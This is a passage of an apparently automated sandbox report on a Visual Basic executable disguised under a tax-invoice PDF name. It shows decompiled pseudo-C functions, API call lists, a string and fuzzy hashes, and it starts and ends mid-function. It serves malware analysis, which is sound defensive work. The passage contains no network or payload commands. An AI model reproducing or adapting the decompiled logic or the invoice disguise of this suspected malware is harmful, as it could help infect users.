				_v116 = _t126;
				_v88 = 0x80020004;
				_v96 = 0xa;
				if( *0x41a010 != 0) {
					_v136 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v136 = 0x41a010;
				}
				_t130 =  &_v44;
				L0040169C();
				_v108 = _t130;
				_t134 =  *((intOrPtr*)( *_v108 + 0x130))(_v108,  &_v40, _t130,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x374))( *_v136));
				asm("fclex");
				_v112 = _t134;
				if(_v112 >= 0) {
					_v140 = _v140 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x4117b8);
					_push(_v108);
					_push(_v112);
					L00401690();
					_v140 = _t134;
				}
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t138 =  *((intOrPtr*)( *_v116 + 0x1ec))(_v116, _v40, 0x10);
				asm("fclex");
				_v120 = _t138;
				if(_v120 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4117fc);
					_push(_v116);
					_push(_v120);
					L00401690();
					_v144 = _t138;
				}
				L0040165A();
				_push( &_v48);
				_push( &_v44);
				_push(2);
				L00401654();
				_v56 = 0x80020004;
				_v64 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v64);
				_push(0x411a10);
				_push( &_v80);
				L00401582();
				_t143 =  &_v80;
				_push(_t143);
				_push(0x2008);
				L00401588();
				_v104 = _t143;
				_push( &_v104);
				_push( &_v32);
				L0040158E();
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401666();
				_t150 =  *((intOrPtr*)(_v32 + 0xc));
				_push( *((intOrPtr*)(_t150 + (0 -  *((intOrPtr*)(_v32 + 0x14))) * 4)));
				_push(0x411830);
				L0040164E();
				if(_t150 != 0) {
					if( *0x41a010 != 0) {
						_v148 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v148 = 0x41a010;
					}
					_t162 =  &_v44;
					L0040169C();
					_v108 = _t162;
					_t166 =  *((intOrPtr*)( *_v108 + 0x168))(_v108,  &_v100, _t162,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x364))( *_v148));
					asm("fclex");
					_v112 = _t166;
					if(_v112 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x168);
						_push(0x4119b4);
						_push(_v108);
						_push(_v112);
						L00401690();
						_v152 = _t166;
					}
					_t169 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, _v100);
					asm("fclex");
					_v116 = _t169;
					if(_v116 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x411138);
						_push(_a4);
						_push(_v116);
						L00401690();
						_v156 = _t169;
					}
					L0040168A();
				}
				if( *0x41a010 != 0) {
					_v160 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v160 = 0x41a010;
				}
				_t154 =  &_v44;
				L0040169C();
				_v108 = _t154;
				_t157 =  *((intOrPtr*)( *_v108 + 0x194))(_v108, _t154,  *((intOrPtr*)( *((intOrPtr*)( *_v160)) + 0x338))( *_v160));
				asm("fclex");
				_v112 = _t157;
				if(_v112 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(0x194);
					_push(0x4117c8);
					_push(_v108);
					_push(_v112);
					L00401690();
					_v164 = _t157;
				}
				L0040168A();
				_v36 = 0x380e9b;
				_push(0x4173e6);
				L0040165A();
				_t158 =  &_v32;
				_push(_t158);
				_push(0);
				L0040157C();
				return _t158;
			}

0x0041700a
0x00417019
0x00417025
0x0041702d
0x00417030
0x00417037
0x00417046
0x0041704f
0x0041705b
0x00417075
0x0041705d
0x0041705d
0x00417062
0x00417067
0x0041706c
0x0041706c
0x0041708f
0x00417090
0x00417093
0x00417094
0x00417099
0x0041709c
0x004170a3
0x004170b1
0x004170ce
0x004170b3
0x004170b3
0x004170b8
0x004170bd
0x004170c2
0x004170c2
0x004170f2
0x004170f6
0x004170fb
0x0041710a
0x00417110
0x00417112
0x00417119
0x00417138
0x0041711b
0x0041711b
0x00417120
0x00417125
0x00417128
0x0041712b
0x00417130
0x00417130
0x00417142
0x0041714c
0x0041714d
0x0041714e
0x0041714f
0x0041715b
0x00417161
0x00417163
0x0041716a
0x00417189
0x0041716c
0x0041716c
0x00417171
0x00417176
0x00417179
0x0041717c
0x00417181
0x00417181
0x00417193
0x0041719b
0x0041719f
0x004171a0
0x004171a2
0x004171aa
0x004171b1
0x004171b8
0x004171ba
0x004171bf
0x004171c0
0x004171c8
0x004171c9
0x004171ce
0x004171d1
0x004171d2
0x004171d7
0x004171dc
0x004171e2
0x004171e6
0x004171e7
0x004171ef
0x004171f3
0x004171f4
0x004171f6
0x00417209
0x0041720c
0x0041720f
0x00417214
0x0041721b
0x00417228
0x00417245
0x0041722a
0x0041722a
0x0041722f
0x00417234
0x00417239
0x00417239
0x00417269
0x0041726d
0x00417272
0x00417281
0x00417287
0x00417289
0x00417290
0x004172af
0x00417292
0x00417292
0x00417297
0x0041729c
0x0041729f
0x004172a2
0x004172a7
0x004172a7
0x004172c1
0x004172c7
0x004172c9
0x004172d0
0x004172ef
0x004172d2
0x004172d2
0x004172d7
0x004172dc
0x004172df
0x004172e2
0x004172e7
0x004172e7
0x004172f9
0x004172f9
0x00417305
0x00417322
0x00417307
0x00417307
0x0041730c
0x00417311
0x00417316
0x00417316
0x00417346
0x0041734a
0x0041734f
0x0041735a
0x00417360
0x00417362
0x00417369
0x00417388
0x0041736b
0x0041736b
0x00417370
0x00417375
0x00417378
0x0041737b
0x00417380
0x00417380
0x00417392
0x00417397
0x0041739e
0x004173d5
0x004173da
0x004173dd
0x004173de
0x004173e0
0x004173e5

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00417025
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 0041704F
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00417067
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417094
__vbaNew2.MSVBVM60(00411D38,0041A010,?,00000000), ref: 004170BD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004170F6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,00000130), ref: 0041712B
__vbaChkstk.MSVBVM60(00000000,?,004117B8,00000130), ref: 00417142
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 0041717C
__vbaFreeStr.MSVBVM60(00000000,?,004117FC,000001EC), ref: 00417193
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004171A2
#711.MSVBVM60(?,00411A10,0000000A,000000FF,00000000), ref: 004171C9
__vbaAryVar.MSVBVM60(00002008,?,?,00411A10,0000000A,000000FF,00000000), ref: 004171D7
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00411A10,0000000A,000000FF,00000000), ref: 004171E7
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00411A10,0000000A,000000FF,00000000), ref: 004171F6
__vbaStrCmp.MSVBVM60(00411830,?,?,?,?,?,?,004014B6), ref: 00417214
__vbaNew2.MSVBVM60(00411D38,0041A010,00411830,?,?,?,?,?,?,004014B6), ref: 00417234
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041726D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119B4,00000168), ref: 004172A2
__vbaHresultCheckObj.MSVBVM60(00000000,00401370,00411138,00000254), ref: 004172E2
__vbaFreeObj.MSVBVM60(00000000,00401370,00411138,00000254), ref: 004172F9
__vbaNew2.MSVBVM60(00411D38,0041A010,00411830,?,?,?,?,?,?,004014B6), ref: 00417311
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041734A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117C8,00000194), ref: 0041737B
__vbaFreeObj.MSVBVM60(00000000,?,004117C8,00000194), ref: 00417392
__vbaFreeStr.MSVBVM60(004173E6), ref: 004173D5
__vbaAryDestruct.MSVBVM60(00000000,?,004173E6), ref: 004173E0

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2$ChkstkCopyList$#711Destruct
String ID:
API String ID: 3937751175-0
Opcode ID: d2b9834e3e4c002eccf948065a426723bec484b09d7ae7b6641bf10b5264ddd3
Instruction ID: bcaeedb43767119eeb58685464cc1a57ea2f595852b4e93e53386b973af84db2
Opcode Fuzzy Hash: d2b9834e3e4c002eccf948065a426723bec484b09d7ae7b6641bf10b5264ddd3
Instruction Fuzzy Hash: EAB1E671900208AFDB10DFA4CC49FDDBBB8BF08314F1045AAE509BB2A1DB799985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416915, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00416915(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				short _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v48;
				char _v56;
				char* _v64;
				intOrPtr _v72;
				void* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				signed short _t103;
				char* _t111;
				signed int _t114;
				char* _t118;
				signed int _t122;
				signed int _t128;
				signed int _t134;
				void* _t161;
				void* _t163;
				intOrPtr _t164;

				_t164 = _t163 - 0xc;
				 *[fs:0x0] = _t164;
				L004014B0();
				_v16 = _t164;
				_v12 = 0x401338;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4014b6, _t161);
				_v64 = L"theatrelike";
				_v72 = 8;
				L004015FA();
				_t103 =  &_v56;
				_push(_t103);
				L004015A0();
				asm("sbb eax, eax");
				_v92 =  ~( ~( ~_t103));
				L00401636();
				if(_v92 != 0) {
					if( *0x41a31c != 0) {
						_v120 = 0x41a31c;
					} else {
						_push(0x41a31c);
						_push(0x411788);
						L00401696();
						_v120 = 0x41a31c;
					}
					_v92 =  *_v120;
					_t128 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v36);
					asm("fclex");
					_v96 = _t128;
					if(_v96 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411778);
						_push(_v92);
						_push(_v96);
						L00401690();
						_v124 = _t128;
					}
					_v100 = _v36;
					_v64 = 0x80020004;
					_v72 = 0xa;
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t134 =  *((intOrPtr*)( *_v100 + 0x54))(_v100, 0x10,  &_v40);
					asm("fclex");
					_v104 = _t134;
					if(_v104 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x4119f0);
						_push(_v100);
						_push(_v104);
						L00401690();
						_v128 = _t134;
					}
					_v116 = _v40;
					_v40 = _v40 & 0x00000000;
					_v48 = _v116;
					_v56 = 9;
					_push(0x10);
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v28);
					L00401660();
					L0040168A();
					L00401636();
				}
				if( *0x41a010 != 0) {
					_v132 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v132 = 0x41a010;
				}
				_t111 =  &_v36;
				L0040169C();
				_v92 = _t111;
				_t114 =  *((intOrPtr*)( *_v92 + 0x1ac))(_v92, _t111,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x314))( *_v132));
				asm("fclex");
				_v96 = _t114;
				if(_v96 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x4117d8);
					_push(_v92);
					_push(_v96);
					L00401690();
					_v136 = _t114;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v140 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v140 = 0x41a010;
				}
				_t118 =  &_v36;
				L0040169C();
				_v92 = _t118;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t122 =  *((intOrPtr*)( *_v92 + 0x1b0))(_v92, 0x10, _t118,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
				asm("fclex");
				_v96 = _t122;
				if(_v96 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x4117d8);
					_push(_v92);
					_push(_v96);
					L00401690();
					_v144 = _t122;
				}
				L0040168A();
				_v32 = 0x7c1;
				_push(0x416c0f);
				L0040168A();
				return _t122;
			}

0x00416918
0x00416927
0x00416931
0x00416939
0x0041693c
0x00416943
0x00416952
0x00416955
0x0041695c
0x00416969
0x0041696e
0x00416971
0x00416972
0x0041697a
0x00416980
0x00416987
0x00416992
0x0041699f
0x004169b9
0x004169a1
0x004169a1
0x004169a6
0x004169ab
0x004169b0
0x004169b0
0x004169c5
0x004169d4
0x004169d7
0x004169d9
0x004169e0
0x004169f9
0x004169e2
0x004169e2
0x004169e4
0x004169e9
0x004169ec
0x004169ef
0x004169f4
0x004169f4
0x00416a00
0x00416a03
0x00416a0a
0x00416a18
0x00416a22
0x00416a23
0x00416a24
0x00416a25
0x00416a2e
0x00416a31
0x00416a33
0x00416a3a
0x00416a53
0x00416a3c
0x00416a3c
0x00416a3e
0x00416a43
0x00416a46
0x00416a49
0x00416a4e
0x00416a4e
0x00416a5a
0x00416a5d
0x00416a64
0x00416a67
0x00416a6e
0x00416a71
0x00416a7b
0x00416a7c
0x00416a7d
0x00416a7e
0x00416a7f
0x00416a81
0x00416a84
0x00416a8c
0x00416a94
0x00416a94
0x00416aa0
0x00416aba
0x00416aa2
0x00416aa2
0x00416aa7
0x00416aac
0x00416ab1
0x00416ab1
0x00416ad5
0x00416ad9
0x00416ade
0x00416ae9
0x00416aef
0x00416af1
0x00416af8
0x00416b17
0x00416afa
0x00416afa
0x00416aff
0x00416b04
0x00416b07
0x00416b0a
0x00416b0f
0x00416b0f
0x00416b21
0x00416b2d
0x00416b4a
0x00416b2f
0x00416b2f
0x00416b34
0x00416b39
0x00416b3e
0x00416b3e
0x00416b6e
0x00416b72
0x00416b77
0x00416b7a
0x00416b81
0x00416b8b
0x00416b95
0x00416b96
0x00416b97
0x00416b98
0x00416ba1
0x00416ba7
0x00416ba9
0x00416bb0
0x00416bcf
0x00416bb2
0x00416bb2
0x00416bb7
0x00416bbc
0x00416bbf
0x00416bc2
0x00416bc7
0x00416bc7
0x00416bd9
0x00416bde
0x00416be4
0x00416c09
0x00416c0e

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00416931
__vbaVarDup.MSVBVM60 ref: 00416969
#558.MSVBVM60(?), ref: 00416972
__vbaFreeVar.MSVBVM60(?), ref: 00416987
__vbaNew2.MSVBVM60(00411788,0041A31C,?), ref: 004169AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,0000001C,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004169EF
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416A18
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119F0,00000054,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416A49
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416A71
__vbaLateIdSt.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416A84
__vbaFreeObj.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416A8C
__vbaFreeVar.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416A94
__vbaNew2.MSVBVM60(00411D38,0041A010,?), ref: 00416AAC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416AD9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,000001AC), ref: 00416B0A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416B21
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 00416B39
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416B72
__vbaChkstk.MSVBVM60(?,00000000), ref: 00416B8B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,000001B0), ref: 00416BC2
__vbaFreeObj.MSVBVM60(00000000,?,004117D8,000001B0), ref: 00416BD9
__vbaFreeObj.MSVBVM60(00416C0F), ref: 00416C09

Strings

theatrelike, xrefs: 00416955

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckChkstkHresult$New2$#558Late
String ID: theatrelike
API String ID: 2936400604-1874956215
Opcode ID: cbae39ac4e42455f1c7f1c8e57e3589d00e9ce5037ae1ee7a07af025fe8da3c6
Instruction ID: 573d2af947e8a863ba8a6056251fed1423c21245c4a978d2212f8753c617660a
Opcode Fuzzy Hash: cbae39ac4e42455f1c7f1c8e57e3589d00e9ce5037ae1ee7a07af025fe8da3c6
Instruction Fuzzy Hash: FF91E570900218AFCF10DFE5C849BDDBBB5BF09308F20446AE505BB2A1DB79A985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00415258, Relevance: 37.7, APIs: 25, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00415258(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				void* _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				char* _t114;
				signed int _t117;
				char* _t121;
				signed int _t125;
				char* _t129;
				signed int _t133;
				short _t134;
				char* _t140;
				signed int _t144;
				char* _t145;
				signed int _t148;
				void* _t173;
				void* _t175;
				intOrPtr _t176;
				signed int _t181;

				_t176 = _t175 - 0xc;
				 *[fs:0x0] = _t176;
				L004014B0();
				_v16 = _t176;
				_v12 = 0x401278;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x68,  *[fs:0x0], 0x4014b6, _t173);
				if( *0x41a010 != 0) {
					_v92 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v92 = 0x41a010;
				}
				_t114 =  &_v40;
				L0040169C();
				_v68 = _t114;
				_t117 =  *((intOrPtr*)( *_v68 + 0x208))(_v68, _t114,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x310))( *_v92));
				asm("fclex");
				_v72 = _t117;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x208);
					_push(0x4118a4);
					_push(_v68);
					_push(_v72);
					L00401690();
					_v96 = _t117;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v100 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v100 = 0x41a010;
				}
				_t121 =  &_v40;
				L0040169C();
				_v68 = _t121;
				_v52 = 0x80020004;
				_v60 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t125 =  *((intOrPtr*)( *_v68 + 0x12c))(_v68, 0x10, _t121,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x34c))( *_v100));
				asm("fclex");
				_v72 = _t125;
				_t181 = _v72;
				if(_t181 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x12c);
					_push(0x4118b4);
					_push(_v68);
					_push(_v72);
					L00401690();
					_v104 = _t125;
				}
				L0040168A();
				_push(0x4118c8);
				L004015D6();
				asm("fcomp qword [0x4011d0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t181 != 0) {
					if( *0x41a31c != 0) {
						_v108 = 0x41a31c;
					} else {
						_push(0x41a31c);
						_push(0x411788);
						L00401696();
						_v108 = 0x41a31c;
					}
					_v76 =  *_v108;
					if( *0x41a010 != 0) {
						_v112 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v112 = 0x41a010;
					}
					_t140 =  &_v40;
					L0040169C();
					_v68 = _t140;
					_t144 =  *((intOrPtr*)( *_v68 + 0x48))(_v68,  &_v36, _t140,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x328))( *_v112));
					asm("fclex");
					_v72 = _t144;
					if(_v72 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4117d8);
						_push(_v68);
						_push(_v72);
						L00401690();
						_v116 = _t144;
					}
					L004015D0();
					_t145 =  &_v44;
					L0040169C();
					_t148 =  *((intOrPtr*)( *_v76 + 0x40))(_v76, _t145, _t145, _t144, _v32, 0x4118cc, _v36);
					asm("fclex");
					_v80 = _t148;
					if(_v80 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x411778);
						_push(_v76);
						_push(_v80);
						L00401690();
						_v120 = _t148;
					}
					L0040165A();
					_push( &_v44);
					_push( &_v40);
					_push(2);
					L00401654();
				}
				if( *0x41a010 != 0) {
					_v124 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v124 = 0x41a010;
				}
				_t129 =  &_v40;
				L0040169C();
				_v68 = _t129;
				_t133 =  *((intOrPtr*)( *_v68 + 0x88))(_v68,  &_v64, _t129,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x34c))( *_v124));
				asm("fclex");
				_v72 = _t133;
				if(_v72 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x4118b4);
					_push(_v68);
					_push(_v72);
					L00401690();
					_v128 = _t133;
				}
				_t134 = _v64;
				_v28 = _t134;
				L0040168A();
				asm("wait");
				_push(0x4155b0);
				L0040168A();
				return _t134;
			}

0x0041525b
0x0041526a
0x00415274
0x0041527c
0x0041527f
0x00415286
0x00415295
0x0041529f
0x004152b9
0x004152a1
0x004152a1
0x004152a6
0x004152ab
0x004152b0
0x004152b0
0x004152d4
0x004152d8
0x004152dd
0x004152e8
0x004152ee
0x004152f0
0x004152f7
0x00415313
0x004152f9
0x004152f9
0x004152fe
0x00415303
0x00415306
0x00415309
0x0041530e
0x0041530e
0x0041531a
0x00415326
0x00415340
0x00415328
0x00415328
0x0041532d
0x00415332
0x00415337
0x00415337
0x0041535b
0x0041535f
0x00415364
0x00415367
0x0041536e
0x00415378
0x00415382
0x00415383
0x00415384
0x00415385
0x0041538e
0x00415394
0x00415396
0x00415399
0x0041539d
0x004153b9
0x0041539f
0x0041539f
0x004153a4
0x004153a9
0x004153ac
0x004153af
0x004153b4
0x004153b4
0x004153c0
0x004153c5
0x004153ca
0x004153cf
0x004153d5
0x004153d7
0x004153d8
0x004153e5
0x004153ff
0x004153e7
0x004153e7
0x004153ec
0x004153f1
0x004153f6
0x004153f6
0x0041540b
0x00415415
0x0041542f
0x00415417
0x00415417
0x0041541c
0x00415421
0x00415426
0x00415426
0x0041544a
0x0041544e
0x00415453
0x00415462
0x00415465
0x00415467
0x0041546e
0x00415487
0x00415470
0x00415470
0x00415472
0x00415477
0x0041547a
0x0041547d
0x00415482
0x00415482
0x00415496
0x0041549c
0x004154a0
0x004154ae
0x004154b1
0x004154b3
0x004154ba
0x004154d3
0x004154bc
0x004154bc
0x004154be
0x004154c3
0x004154c6
0x004154c9
0x004154ce
0x004154ce
0x004154da
0x004154e2
0x004154e6
0x004154e7
0x004154e9
0x004154ee
0x004154f8
0x00415512
0x004154fa
0x004154fa
0x004154ff
0x00415504
0x00415509
0x00415509
0x0041552d
0x00415531
0x00415536
0x00415545
0x0041554b
0x0041554d
0x00415554
0x00415570
0x00415556
0x00415556
0x0041555b
0x00415560
0x00415563
0x00415566
0x0041556b
0x0041556b
0x00415574
0x00415578
0x0041557f
0x00415584
0x00415585
0x004155aa
0x004155af

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00415274
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004152AB
__vbaObjSet.MSVBVM60(?,00000000), ref: 004152D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118A4,00000208), ref: 00415309
__vbaFreeObj.MSVBVM60(00000000,?,004118A4,00000208), ref: 0041531A
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 00415332
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041535F
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415378
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,0000012C), ref: 004153AF
__vbaFreeObj.MSVBVM60(00000000,?,004118B4,0000012C), ref: 004153C0
__vbaR8Str.MSVBVM60(004118C8), ref: 004153CA
__vbaNew2.MSVBVM60(00411788,0041A31C,004118C8), ref: 004153F1
__vbaNew2.MSVBVM60(00411D38,0041A010,004118C8), ref: 00415421
__vbaObjSet.MSVBVM60(?,00000000,?,?,004118C8), ref: 0041544E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,00000048,?,?,004118C8), ref: 0041547D
__vbaCastObj.MSVBVM60(?,004118CC,?,?,?,004118C8), ref: 00415496
__vbaObjSet.MSVBVM60(?,00000000,?,004118CC,?,?,?,004118C8), ref: 004154A0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000040,?,?,004118C8), ref: 004154C9
__vbaFreeStr.MSVBVM60(?,?,?,?,004118C8), ref: 004154DA
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,004118C8), ref: 004154E9
__vbaNew2.MSVBVM60(00411D38,0041A010,004118C8), ref: 00415504
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,004118C8), ref: 00415531
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,00000088,?,?,?,?,?,004118C8), ref: 00415566
__vbaFreeObj.MSVBVM60(?,?,?,?,?,004118C8), ref: 0041557F
__vbaFreeObj.MSVBVM60(004155B0,?,?,?,?,?,004118C8), ref: 004155AA

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$Chkstk$CastList
String ID:
API String ID: 2710452558-0
Opcode ID: 18ebb316c18d1b891171ae0a240c7f1ed033da484c17d85daf48e6bb307f9ef2
Instruction ID: e5be88cd0c6c02efd101e7b3f47cee8ed86f8fe676371c53208a2379f6473cca
Opcode Fuzzy Hash: 18ebb316c18d1b891171ae0a240c7f1ed033da484c17d85daf48e6bb307f9ef2
Instruction Fuzzy Hash: A3A11870900608EFCB10EFE1C849BDDBBB9BF48304F20496AE501BB2A1D7796995DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00414F85, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00414F85(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				intOrPtr _v64;
				char _v72;
				signed int _v76;
				signed int _v80;
				char _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				void* _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				char* _t88;
				char* _t90;
				signed int _t93;
				char* _t95;
				void* _t110;
				void* _t112;
				intOrPtr* _t113;
				signed long long _t126;

				_t113 = _t112 - 0xc;
				 *[fs:0x0] = _t113;
				L004014B0();
				_v16 = _t113;
				_v12 = 0x401268;
				_v8 = 0;
